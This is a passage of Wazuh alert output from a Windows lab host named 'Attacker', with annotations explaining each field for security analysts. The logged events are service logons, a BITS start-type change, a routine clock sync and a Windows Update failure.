Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533893.185389 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:52:29.1249111Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43498 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 12304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533894.192727 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:52:30.5148874Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43500 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14292 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533895.200065 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:46:35.8478096Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2935 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533895.201877 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:52:32.6925669Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43508 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 11096 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533896.209215 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider that wrote the event. This is the Security log's audit provider, so every 4xxx audit event carries it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} GUID of that provider. Stable across hosts and display languages, so it is a safer filter key than the name.
data.win.system.eventID: 4616 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! 4616 = the system time was changed.
data.win.system.version: 1 Schema version of the event template; a bump means Microsoft added fields.
data.win.system.level: 0 Numeric level: 0 = Log Always (what audit events use), 2 = Error, 4 = Information.
data.win.system.task: 12288 Windows task category (Logon, Policy Change, etc.). 12288 = Security State Change.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering. 0x8020000000000000 = Audit Success; 0x8010000000000000 would be Audit Failure.
data.win.system.systemTime: 2025-04-17T16:55:16.5362324Z UTC time Windows wrote the record, at 100 ns resolution. It is a week older than the Wazuh alert id (an epoch timestamp from 2025-04-24), so the event was ingested late: build timelines on this field, not on the alert id.
data.win.system.eventRecordID: 43510 Incremental log record number – handy for timeline order.
data.win.system.processID: 4 PID of the process that logged the record; 4 is the System process.
data.win.system.threadID: 12620 Thread inside that process. Deep forensics only.
data.win.system.channel: Security Event log channel (Security, System, Application). Security events only exist if the matching audit policy is enabled.
data.win.system.computer: Attacker Computer name stamped by Windows itself; cross-check against agent.name to catch agents registered under the wrong host.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The system time was changed.
Subject:
Security ID: S-1-5-19
Account Name: LOCAL SERVICE
Account Domain: NT AUTHORITY
Logon ID: 0x3E5
Process Information:
Process ID: 0x1c48
Name: C:\Windows\System32\svchost.exe
Previous Time: 2025-04-17T16:55:16.492136900Z
New Time: 2025-04-17T16:55:16.516484900Z
This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer." Rendered message text. The two things to read are the process and the size of the jump: here svchost.exe (the host process for the W32Time service) under LOCAL SERVICE nudged the clock by about 24 ms, a routine time-sync correction. A user account, a non-svchost binary, or a jump of minutes or more is the clock-tampering signal this event exists for, because a moved clock also scrambles every later log timestamp on the host.
data.win.eventdata.subjectUserSid: S-1-5-19 Well-known SID of NT AUTHORITY\LOCAL SERVICE, the account the Windows Time service runs under.
data.win.eventdata.subjectUserName: LOCAL SERVICE Account that performed the change (the resolved form of the SID above).
data.win.eventdata.subjectDomainName: NT AUTHORITY Pseudo-domain for built-in service accounts.
data.win.eventdata.subjectLogonId: 0x3e5 Logon session of the changer. 0x3e5 is the fixed LOCAL SERVICE session (0x3e7 = SYSTEM, 0x3e4 = NETWORK SERVICE); any other value is a real logon you can pivot to through its 4624.
data.win.eventdata.previousTime: 2025-04-17T16:55:16.4921369Z Clock value before the change (UTC).
data.win.eventdata.newTime: 2025-04-17T16:55:16.5164849Z Clock value after the change. Subtract the two: about +24 ms here. Large or backwards deltas are the alertable case.
data.win.eventdata.processId: 0x1c48 PID (hex) of the changing process; pair it with 4688 or Sysmon EID 1 to see how that process was launched.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe Binary that set the clock (backslashes are doubled by JSON escaping). svchost.exe is expected for W32Time and w32tm.exe run by an admin is also legitimate; anything else deserves a look.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows System error event Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61102 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'system_error'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.3'] GPG13 mapping – UK Good Practice Guide 13 protective-monitoring control.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533896.212420 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-WindowsUpdateClient ETW provider that wrote the event: the Windows Update client.
data.win.system.providerGuid: {945a8954-c147-4acd-923f-40c45405a658} GUID of that provider; use it for language-independent filtering.
data.win.system.eventID: 20 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! For this provider 20 = installation failure (19 = installation success).
data.win.system.version: 1 Schema version of the event template.
data.win.system.level: 2 Numeric level; 2 = Error, which is what made Wazuh rule 61102 fire.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.). Provider-specific numbering here.
data.win.system.opcode: 13 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000028 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:47:27.8984342Z UTC time Windows wrote the record; four days before the Wazuh alert id, so order by this field.
data.win.system.eventRecordID: 2941 Incremental log record number – handy for timeline order. The System log has its own counter, independent of the Security log's 435xx numbers above.
data.win.system.processID: 9648 PID of the Windows Update client process that logged the failure.
data.win.system.threadID: 14168 Thread inside that process. Deep forensics only.
data.win.system.channel: System Event log channel; System is always on, no audit policy needed.
data.win.system.computer: Attacker Computer name stamped by Windows; cross-check against agent.name.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
